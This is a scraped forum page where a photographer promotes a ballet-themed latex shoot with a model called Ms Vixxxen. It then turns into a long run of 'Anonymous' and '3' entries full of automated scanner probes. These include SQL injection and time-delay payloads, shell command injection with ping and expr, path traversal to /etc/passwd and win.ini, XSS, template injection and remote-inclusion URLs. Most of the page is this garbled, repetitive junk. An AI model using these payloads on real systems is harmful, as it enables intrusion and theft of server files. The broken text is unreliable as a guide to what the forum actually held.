My Forums

Public

Profile pic for nimue_allen

Ms Vixxxen

Today's photo update, Latex is the first featuring the gorgeous Ms Vixxxen!

Ms Vixxen is one of the few models I've worked with on here who I hadn't met before hand, but I'm really glad that we did shoot together!  She's a wonderfully passionate and talented lady, who loves to call on her ballet training and combine it with her fetishes, which of course lead us to create some wonderful photos and video.  

Here's just a few samples of what's still to come from that shoot day!

Which of these are you looking forward to seeing most?

tough call; toss up between the last one and the third but last!
Profile pic for nimue_allen

Ballet

Ms Vixxxen trained as a ballerina for many years, so a lot of the stuff we shot made the most of her amazing strength and flexibility.

The last 2 screengrabs are from a movie where she struggles to keep her grace and poise in some rather uncomfortable situations.
Profile pic for AndrewZealand

Wow, she is different. Looks nice and firm bodied. Her hair reminds me of "Elena" a famous classical violinist from New Zealand.

http://sounz.org.nz/media_items/0001/0496/ElenaCDcover_normal.jpg

Anonymous

Anonymous

3

3

3

3

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

3

Anonymous
3

Anonymous

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

Anonymous

-1 OR 1=1

3

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

Anonymous

Anonymous

3

Anonymous
3

-1 OR 1=1

3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

Anonymous

'

3

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

NS1NO

3

1 AND 'NS='ss

3

Anonymous

Anonymous

Anonymous

3

Anonymous
3

' OR 'ns'='ns

3

3

Anonymous
3

3

Anonymous
3

3

Anonymous
3

Anonymous

Anonymous

Anonymous

Anonymous

3

Anonymous
3

-1 OR 17-7=10

3

3

Anonymous
3

1 OR X='ss

3

' OR '1'='1

3

Anonymous

3

Anonymous
3

3

Anonymous
3

"& SET /A 0xFFF9999-2 &

' OR '1'='1

3

3

Anonymous
3

Anonymous

Anonymous

-1 OR 1=1

3

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

-1 OR 1=1

3

Anonymous

3

Anonymous
3

'

3

Anonymous

NS1NO

3

Anonymous

3

Anonymous
3

"& SET /A 0xFFF9999-2 &

3

3

Anonymous
3

1 AND 'NS='ss

3

' OR 'ns'='ns

3

3

Anonymous
3

-1 OR 17-7=10

3

Anonymous

Anonymous

1 OR X='ss

3

Anonymous

3

Anonymous
3

3

Anonymous
3

' OR '1'='1

3

Anonymous

' OR '1'='1

3

3

Anonymous
3

3

Anonymous
3

Anonymous

'& SET /A 0xFFF9999-2 &

3

-1 OR 1=1

Anonymous

3

Anonymous
3

Anonymous

3

-1 OR 1=1

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

'

3

Anonymous
3

3

NS1NO

3

1 AND 'NS='ss

3

' OR 'ns'='ns

Anonymous

3

Anonymous
3

Anonymous

3

-1 OR 17-7=10

3

Anonymous
3

'& SET /A 0xFFF9999-2 &

3

3

Anonymous
3

Anonymous

Anonymous

3

1 OR X='ss

Anonymous

3

Anonymous
3

3

Anonymous
3

3

' OR '1'='1

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

3

Anonymous
3

%27

3

' OR '1'='1

Anonymous

'"--></style></scRipt><scRipt>netsparker(0x001846)</scRipt>

3

-1 OR 1=1

3

Anonymous
3

3

-1 OR 1=1

Anonymous

& SET /A 0xFFF9999-2 &

3

Anonymous
3

3

'

Anonymous

3

Anonymous
3

3

NS1NO

Anonymous

%27

3

3

1 AND 'NS='ss

3

Anonymous
3

Anonymous

3

' OR 'ns'='ns

3

Anonymous
3

3

-1 OR 17-7=10

'"--></style></scRipt><scRipt>netsparker(0x001847)</scRipt>

3

Anonymous

3

1 OR X='ss

3

Anonymous
3

Anonymous

3

' OR '1'='1

3

Anonymous
3

3

' OR '1'='1

Anonymous

Anonymous

3

Anonymous
3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

' WAITFOR DELAY '0:0:25'--

& SET /A 0xFFF9999-2 &

3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x001848%29%3C%2FscRipt%3E

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

"& ping -n 25 127.0.0.1 &

' WAITFOR DELAY '0:0:25'--

3

SET /A 0xFFF9999-2 &

NSFTW

"& ping -n 25 127.0.0.1 &

3

%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x001849%29%3C%2FscRipt%3E

3

SET /A 0xFFF9999-2 &

3

1 WAITFOR DELAY '0:0:25'--

'& ping -n 25 127.0.0.1 &

"&expr 268409241 - 2 &"

NSFTW

3

data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxODRBKTwvc2NyaXB0Pg==

'& ping -n 25 127.0.0.1 &

3

1 WAITFOR DELAY '0:0:25'--

3

"&expr 268409241 - 2 &"

3

& ping -n 25 127.0.0.1 &

'&expr 268409241 - 2 &'

data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxODRCKTwvc2NyaXB0Pg==

3

'+NSFTW+'

WAITFOR DELAY '0:0:25'--

'&expr 268409241 - 2 &'

3

& ping -n 25 127.0.0.1 &

3

'+NSFTW+'

3

WAITFOR DELAY '0:0:25'--

3

'" ns= netsparker(0x00184C)

&expr 268409241 - 2 &

ping -n 25 127.0.0.1 &

1) WAITFOR DELAY '0:0:25'--

'" ns= netsparker(0x00184D)

3

&expr 268409241 - 2 &

3

ping -n 25 127.0.0.1 &

3

%27

1) WAITFOR DELAY '0:0:25'--

3

1 ns=netsparker(0x00184E)

3

%27

') WAITFOR DELAY '0:0:25'--

"&ping -c 25 127.0.0.1 &"

expr 268409241 - 2 &

1 ns=netsparker(0x00184F)

3

"&ping -c 25 127.0.0.1 &"

3

(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

expr 268409241 - 2 &

3

') WAITFOR DELAY '0:0:25'--

3

'&ping -c 25 127.0.0.1 &'

//r87.com/n/n.css?0x001850

3

(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

SET /A 0xFFF9999-2

'&ping -c 25 127.0.0.1 &'

3

')) WAITFOR DELAY '0:0:25'--

//r87.com/n/n.css?0x001851

3

SET /A 0xFFF9999-2

3

'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

')) WAITFOR DELAY '0:0:25'--

3

&ping -c 25 127.0.0.1 &

expr 268409241 - 2

'><net sparker=netsparker(0x001852)>

3

'+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'

&ping -c 25 127.0.0.1 &

3

1)) WAITFOR DELAY '0:0:25'--

'><net sparker=netsparker(0x001853)>

3

ping -c 25 127.0.0.1 &

convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

expr 268409241 - 2

3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

1)) WAITFOR DELAY '0:0:25'--

3

"><net sparker=netsparker(0x001854)>

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

ping -c 25 127.0.0.1 &

3

Anonymous

3

Anonymous
3

3

convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

<!--#exec cmd="expr 268409241 - 2"-->

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

"><net sparker=netsparker(0x001855)>

3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

3

Anonymous
3

Anonymous

ping -n 25 127.0.0.1

<!--#exec cmd="expr 268409241 - 2"-->

3

javascript:netsparker(0x001856)

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

3

'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'

Anonymous

3

Anonymous
3

Anonymous

ping -n 25 127.0.0.1

3

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

"& SET /A 0xFFF9999-2 &

../../../../../../../../../../boot.ini

-1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1

3

'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

javascript:netsparker(0x001857)

3

ping -c 25 127.0.0.1

3

"& SET /A 0xFFF9999-2 &

(select sleep(25))a-- 1

3

'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

<scRipt>ns(0x001858)</scRipt>

../../../../../../../../../../boot.ini

3

'& SET /A 0xFFF9999-2 &

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

ping -c 25 127.0.0.1

3

(select sleep(25))a-- 1

3

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

3

'& SET /A 0xFFF9999-2 &

"& ping -n 25 127.0.0.1 &

<scRipt>ns(0x001859)</scRipt>

3

3

-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini

3

';SELECT pg_sleep(25)--

& SET /A 0xFFF9999-2 &

3

"& ping -n 25 127.0.0.1 &

../../../../../../../../../../boot.ini.php

<%a style=x:expre/**/ssion(netsparker(0x00185A))>

';SELECT pg_sleep(25)--

3

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

3

& SET /A 0xFFF9999-2 &

<%a style=x:expre/**/ssion(netsparker(0x00185B))>

3

3

-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

../../../../../../../../../../boot.ini.php

3

'& ping -n 25 127.0.0.1 &

1;SELECT pg_sleep(25)--

SET /A 0xFFF9999-2 &

3

'& ping -n 25 127.0.0.1 &

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

;ns:expression(netsparker(0x00185C));

3

SET /A 0xFFF9999-2 &

/../../../../../../../../../../boot.ini

& ping -n 25 127.0.0.1 &

1;SELECT pg_sleep(25)--

3

"&expr 268409241 - 2 &"

3

& ping -n 25 127.0.0.1 &

3

-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"

/../../../../../../../../../../boot.ini

3

3

"&expr 268409241 - 2 &"

;ns:expression(netsparker(0x00185D));

3

SELECT pg_sleep(25)--

ping -n 25 127.0.0.1 &

'&expr 268409241 - 2 &'

3

ping -n 25 127.0.0.1 &

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

file:/windows/win.ini

SELECT pg_sleep(25)--

3

3

'&expr 268409241 - 2 &'

body{x:expression(netsparker(0x00185E))}

"&ping -c 25 127.0.0.1 &"

&expr 268409241 - 2 &

3

(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))

3

"&ping -c 25 127.0.0.1 &"

file:/windows/win.ini

3

1);SELECT pg_sleep(25)--

body{x:expression(netsparker(0x00185F))}

3

3

&expr 268409241 - 2 &

'&ping -c 25 127.0.0.1 &'

../../../../../../../../../../windows/win.ini

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

1);SELECT pg_sleep(25)--

3

*/netsparker(0x001860);/*

expr 268409241 - 2 &

3

'&ping -c 25 127.0.0.1 &'

../../../../../../../../../../windows/win.ini

3

');SELECT pg_sleep(25)--

3

cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)

3

expr 268409241 - 2 &

*/netsparker(0x001861);/*

3

&ping -c 25 127.0.0.1 &

SET /A 0xFFF9999-2

3

&ping -c 25 127.0.0.1 &

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

');SELECT pg_sleep(25)--

3

../../../../../../../../../../windows/win.ini.php

'+netsparker(0x001862)+'

3

SET /A 0xFFF9999-2

ping -c 25 127.0.0.1 &

3

'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

../../../../../../../../../../windows/win.ini.php

3

'));SELECT pg_sleep(25)--

'+netsparker(0x001863)+'

3

expr 268409241 - 2

3

ping -c 25 127.0.0.1 &

3

expr 268409241 - 2

'));SELECT pg_sleep(25)--

3

"+netsparker(0x001864)+"

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

c:\windows\win.ini

ping -n 25 127.0.0.1

3

(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)

3

ping -n 25 127.0.0.1

"+netsparker(0x001865)+"

3

1));SELECT pg_sleep(25)--

c:\windows\win.ini

3

3

1));SELECT pg_sleep(25)--

3

NSFTW

&#39;,netsparker(0x001866),&#39;

ping -c 25 127.0.0.1

../../../../../../../../../../windows/iis6.log

(SELECT 1 FROM (SELECT SLEEP(25))A)

3

NSFTW

&#39;,netsparker(0x001867),&#39;

3

3

ping -c 25 127.0.0.1

3

3

../../../../../../../../../../windows/iis6.log

3

(SELECT 1 FROM (SELECT SLEEP(25))A)

3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

hTTp://r87.com/n

'+NSFTW+'

netsparker(0x001868)

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

../../../../../../../../../../proc/self/fd/2

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

response.write(268409241-22)'

netsparker(0x001869)

3

3

'+NSFTW+'

hTTp://r87.com/n

3

../../../../../../../../../../proc/self/fd/2

3

'+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

3

response.write(268409241-22)'

3

netsparker(0x00186A);

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

http://r87.com/n?.php

../../../../../../../../../../proc/self/fd/2.php

-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'

+response.write(268409241-22)'

3

(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)

netsparker(0x00186B);

3

../../../../../../../../../../proc/self/fd/2.php

3

http://r87.com/n?.php

3

+response.write(268409241-22)'

3

-1' or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+'

3

&#39;+netsparker(0x00186C)+&#39;

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

http://r87.com/n?.php

../../../../../../../../../../etc/httpd/logs/error.log

"+response.write(268409241-22)+"

-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)

&#39;+netsparker(0x00186D)+&#39;

3

http://r87.com/n?.php

3

3

-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

"+response.write(268409241-22)+"

3

../../../../../../../../../../etc/httpd/logs/error.log

3

php://filter//resource=http://r87.com/n?.php

-1 or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)

3

<% response.write(268409241-22) %>

'"-->

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1

../../../../../../../../../../etc/httpd/logs/error_log

php://filter//resource=http://r87.com/n?.php

3

<% response.write(268409241-22) %>

3

-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+"

3

-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1

3

'"-->

../../../../../../../../../../etc/httpd/logs/error_log

3

print(int)0xFFF9999-22

r87.com/n

-1" or 1=(SELECT 1 FROM (SELECT SLEEP(25))A)+"

3

1,1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1);

%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x001870%29%3C%2FscRipt%3E

r87.com/n

3

print(int)0xFFF9999-22

3

../../../../../../../../../../var/log/apache2/error.log

' WAITFOR DELAY '0:0:25'--

3

1,1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1);

hTTp://r87.com/n

+print(int)0xFFF9999-22;//

3

%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x001871%29%3C%2FscRipt%3E

../../../../../../../../../../var/log/apache2/error.log

3

+print(int)0xFFF9999-22;//

3

3

hTTp://r87.com/n

3

' WAITFOR DELAY '0:0:25'--

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxODcyKTwvc2NyaXB0Pg==

../../../../../../../../../../var/log/apache/error.log

http://r87.com/n?.php

'+print(int)0xFFF9999-22+'

1 WAITFOR DELAY '0:0:25'--

3

(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))

3

data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAxODczKTwvc2NyaXB0Pg==

../../../../../../../../../../var/log/apache/error.log

3

'+print(int)0xFFF9999-22+'

3

3

http://r87.com/n?.php

3

1 WAITFOR DELAY '0:0:25'--

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

'" ns= netsparker(0x001874)

../../../../../../../../../../proc/version

WAITFOR DELAY '0:0:25'--

"+print(int)0xFFF9999-22+"

3

'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'

http://r87.com/n?.php

3

'" ns= netsparker(0x001875)

3

WAITFOR DELAY '0:0:25'--

../../../../../../../../../../proc/version

3

"+print(int)0xFFF9999-22+"

3

Anonymous

3

Anonymous
3

3

http://r87.com/n?.php

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

ns:netsparker056650=vuln

1 ns=netsparker(0x001876)

1) WAITFOR DELAY '0:0:25'--

../../../../../../../../../../proc/version.php

<? print(int)0xFFF9999-22;//?>

php://filter//resource=http://r87.com/n?.php

ns:netsparker056650=vuln

3

3

1 ns=netsparker(0x001877)

../../../../../../../../../../proc/version.php

3

<? print(int)0xFFF9999-22;//?>

3

3

1) WAITFOR DELAY '0:0:25'--

3

php://filter//resource=http://r87.com/n?.php

http://example.com/? ns: netsparker056650=vuln

//r87.com/n/n.css?0x001878

{php}print(int)0xFFF9999-22;{/php}

r87.com/n

../../../../../../../../../../../etc/passwd

') WAITFOR DELAY '0:0:25'--

http://example.com/? ns: netsparker056650=vuln

3

{php}print(int)0xFFF9999-22;{/php}

3

3

//r87.com/n/n.css?0x001879

3

r87.com/n

3

') WAITFOR DELAY '0:0:25'--

../../../../../../../../../../../etc/passwd

3

'{${print(int)0xFFF9999-22}}'

ns:netsparker056650=vuln

'>

')) WAITFOR DELAY '0:0:25'--

../../../../../../../../../../../etc/passwd

'{${print(int)0xFFF9999-22}}'

3

3

3

3

'>

ns:netsparker056650=vuln

3

[php]print(int)0xFFF9999-22;[/php]

3

')) WAITFOR DELAY '0:0:25'--

Anonymous

3

Anonymous
3

Anonymous

3

Anonymous
3

${28275*28275-(13)}

../../../../../../../../../../../etc/passwd

3

[php]print(int)0xFFF9999-22;[/php]

3

">

ns:netsparker056650=vuln

1)) WAITFOR DELAY '0:0:25'--

print 0xFFF9999-22

${28275*28275-(13)}

3

../../../../../../../../../../../etc/passwd.php

print 0xFFF9999-22

3

3

">

3

1)) WAITFOR DELAY '0:0:25'--

ns:netsparker056650=vuln

3

eval('print 0xFFF9999-22')

../../../../../../../../../../../etc/passwd.php

3

#{28275*28275-(13)}

javascript:netsparker(0x00187E)

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

eval('print 0xFFF9999-22')

3

ns:netsparker056650=vuln

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

#{28275*28275-(13)}

3

'+print 0xFFF9999-22+'

3

javascript:netsparker(0x00187F)

3

ns:netsparker056650=vuln

3

1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

'+print 0xFFF9999-22+'

3

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

3

${28275*28275-(13)}

"+print 0xFFF9999-22+"

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

http://example.com/?
ns: netsparker056650=vuln

"+print 0xFFF9999-22+"

3

/../../../../../../../../../../../etc/passwd

3

${28275*28275-(13)}

response.write(268409241-22)'

3

3

1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

3

http://example.com/?
ns: netsparker056650=vuln

3

response.write(268409241-22)'

/../../../../../../../../../../../etc/passwd

3

#{28275*28275-(13)}

+response.write(268409241-22)'

1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--

ns:netsparker056650=vuln

<%a style=x:expre/**/ssion(netsparker(0x001882))>

3

#{28275*28275-(13)}

3

+response.write(268409241-22)'

/etc/passwd

Anonymous

3

Anonymous
3

"+response.write(268409241-22)+"

"||NETSPARKER||

"||NETSPARKER||

3

"||NETSPARKER||

3

ns:netsparker056650=vuln

3

"||NETSPARKER||

3

